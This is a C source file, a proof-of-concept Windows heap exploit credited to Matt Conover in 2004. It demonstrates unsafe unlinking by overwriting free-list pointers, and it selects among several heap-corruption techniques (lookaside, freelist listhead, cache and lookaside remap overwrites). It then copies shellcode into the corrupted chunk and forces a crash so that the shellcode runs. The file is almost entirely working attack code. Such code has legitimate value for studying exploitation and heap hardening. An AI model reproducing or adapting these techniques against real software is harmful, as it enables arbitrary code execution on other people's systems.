// Proof-of-concept code heap exploit code
// Written by Matt Conover in December 2004
#include <stdio.h>
#include <windows.h>
#undef NDEBUG
#include <assert.h>
#include "heap.h"
#include "util.h"
#include "shellcode.h"

BYTE *Shellcode;
DWORD ShellcodeLength;
BYTE *pTEB, *pPEB;

void TestThread()
{
	_asm
	{
		mov eax, fs:[0x18]
		mov pTEB, eax
	}
	printf("TEB 0x%08lx\n", pTEB);
	while (1) { Sleep(1000); }
}

int main(int argc, char *argv[])
{
	int i;
	BYTE *p;
	HEAP *pHeap;
	FILE *outfile = stdout;
	BOOL DoRandomAllocs = TRUE, DumpMem = FALSE, TestUnsafeUnlink = TRUE;

	if (argc > 1) outfile = fopen(argv[1], "w");
	if (!outfile) return -1;

#if 0
	if (*((DWORD *)PEB_LOCK_ROUTINE) != RTL_ENTER_CRITICAL_SECTION ||
		GetProcAddress(GetModuleHandle("ntdll"), "ZwTerminateThread") != (FARPROC)ZW_TERMINATE_THREAD ||
		GetProcAddress(GetModuleHandle("ntdll"), "ZwTerminateProcess") != (FARPROC)ZW_TERMINATE_PROCESS ||
		GetProcAddress(GetModuleHandle("kernel32"), "Sleep") != (FARPROC)SLEEP)
	{
		fprintf(stderr, "ERROR: You did not configure the settings properly\n");
		fprintf(stderr, "Define TEST_XPSP1 for XPSP1, TEST_XPSP2 for XPSP2, etc. (look at shellcode.h)\n");
		exit(0);
	}
#endif

	////////////////////////////////////////////////////////////////////////////////
	// Setup heap

#ifdef USE_C_SHELLCODE
	Shellcode = GetFunctionAddress((BYTE *)c_shellcode_stub);
#else
	Shellcode = GetFunctionAddress((BYTE *)shellcode_stub);
#endif
	ShellcodeLength = GetStubLength((BYTE *)Shellcode);
	//printf("Shellcode is %d bytes\n", ShellcodeLength);


	// Here we use a different heap to make things easier
	pHeap = HeapCreate(2, 0x10000, 0);
	pHeap->ForceFlags = HEAP_GROWABLE;

	if (DumpMem) // demonstrate TEB
	{
		_asm
		{
			mov eax, fs:[0x18]
			mov pTEB, eax
			mov eax, [eax+0x30]
			mov pPEB, eax
		}
		printf("PEB at 0x%08lx, Heap base 0x%08lx\n", pPEB, pTEB, pHeap);
		printf("TEB at 0x%08lx\n", pTEB);
		assert(pTEB >= (BYTE *)0x7ffd4000); assert(pPEB >= (BYTE *)0x7ffd4000);
		for (i = 0; i < 11; i++)
		{
			Sleep(100);
			assert(CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)TestThread, NULL, 0, NULL));
		}
	}
	
	if (TestUnsafeUnlink)
	{
		HEAP_FREE_ENTRY *chunk;

		p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
		chunk = (HEAP_FREE_ENTRY *)(p - sizeof(HEAP_ENTRY));
		FillLookasideList(pHeap, ALLOC_SIZE);
		HeapFree(pHeap, 0, p);
		EmptyLookasideList(pHeap, ALLOC_SIZE);

		printf("before overwrite:\n");
		printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[8], pHeap->FreeLists[8].Flink, pHeap->FreeLists[8].Blink);
		printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[9], pHeap->FreeLists[9].Flink, pHeap->FreeLists[9].Blink);
		printf("chunk    [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", chunk, chunk->FreeList.Flink, chunk->FreeList.Blink);
	
		chunk->FreeList.Flink = (LIST_ENTRY *)(&pHeap->FreeLists[8].Blink);
		chunk->FreeList.Blink = (LIST_ENTRY *)(&pHeap->FreeLists[9].Blink);
		printf("\nafter overwrite:\n");
		printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[8], pHeap->FreeLists[8].Flink, pHeap->FreeLists[8].Blink);
		printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[9], pHeap->FreeLists[9].Flink, pHeap->FreeLists[9].Blink);
		printf("chunk    [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", chunk, chunk->FreeList.Flink, chunk->FreeList.Blink);

		p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
		printf("\nafter 1st alloc (returned 0x%08lx):\n", p);
		printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[8], pHeap->FreeLists[8].Flink, pHeap->FreeLists[8].Blink);
		printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[9], pHeap->FreeLists[9].Flink, pHeap->FreeLists[9].Blink);
		
		p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
		printf("\nafter 2nd alloc (returned 0x%08lx):\n", p);
		printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[8], pHeap->FreeLists[8].Flink, pHeap->FreeLists[8].Blink);
		printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[9], pHeap->FreeLists[9].Flink, pHeap->FreeLists[9].Blink);
		printf("Copying 0x909090909090909090 into new chunk\n");
		memset(p, 0x90, 12);
		printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[8], pHeap->FreeLists[8].Flink, pHeap->FreeLists[8].Blink);
		printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[9], pHeap->FreeLists[9].Flink, pHeap->FreeLists[9].Blink);
		exit(0);
	}

	if (DoRandomAllocs)
	{
		int ChunkSize, FreeChance, FreeCount, BusyCount, Count;
		char *p;
		
		srand(GetTickCount());
		Count = (rand() % 1000) + 10;
		FreeCount = BusyCount = 0;

		for (i = 0; i < Count; i++)
		{
			FreeChance = (rand() % 100);
			ChunkSize = ((rand() % 1016) + 8) & 0xFFFFFFF8;
			printf("\tAllocate %d size chunk", ChunkSize);
			p = GetChunk(pHeap, ChunkSize); assert(p);
			if (FreeChance < 50)
			{
				printf(" (freed)\n");
				FreeCount++;
				HeapFree(pHeap, 0, p);
			}
			else
			{
				putchar('\n');
				BusyCount++;
			}
		}
		printf("\nBase condition (all chunk sizes are < 1K):\n\t%d allocs\n\t%d frees\n\n", Count, FreeCount);
		//printf("Hit Enter to continue... "); getchar();
	}


#ifdef USE_CHUNK_ON_LOOKASIDE_OVERWRITE
	p = DoChunkOnLookasideOverwrite(pHeap);

#elif USE_UNSAFE_UNLINKING_FREELIST_OVERWRITE
	p = DoUnsafeUnlinkingFreeListOverwrite(pHeap);

#elif USE_FREELIST_LISTHEAD_OVERWRITE
	p = DoListHeadOverwrite(pHeap);

#elif USE_LOOKASIDE_LISTHEAD_OVERWRITE
	p = DoListHeadOverwrite(pHeap);
	memcpy(p, Shellcode, ShellcodeLength);

#elif USE_CACHE_OVERWRITE
	assert(InitializeHeapCache(pHeap));
	p = DoCacheOverwrite(pHeap);
	assert(p);

#elif USE_LOOKASIDE_REMAP
	p = DoLookasideRemap(pHeap);
	assert(p);

#else
#error "Not implemented"
#endif

	/////////////////////////////////////////////////////////////////////////////////
	// Now cause a crash to force shellcode execution immediate
	/////////////////////////////////////////////////////////////////////////////////

	assert(p); memcpy(p, Shellcode, ShellcodeLength);
	printf("\nNow forcing a crash...\n");
	p = (BYTE *)0xABABABAB; *p = 0;

	return 0;
}

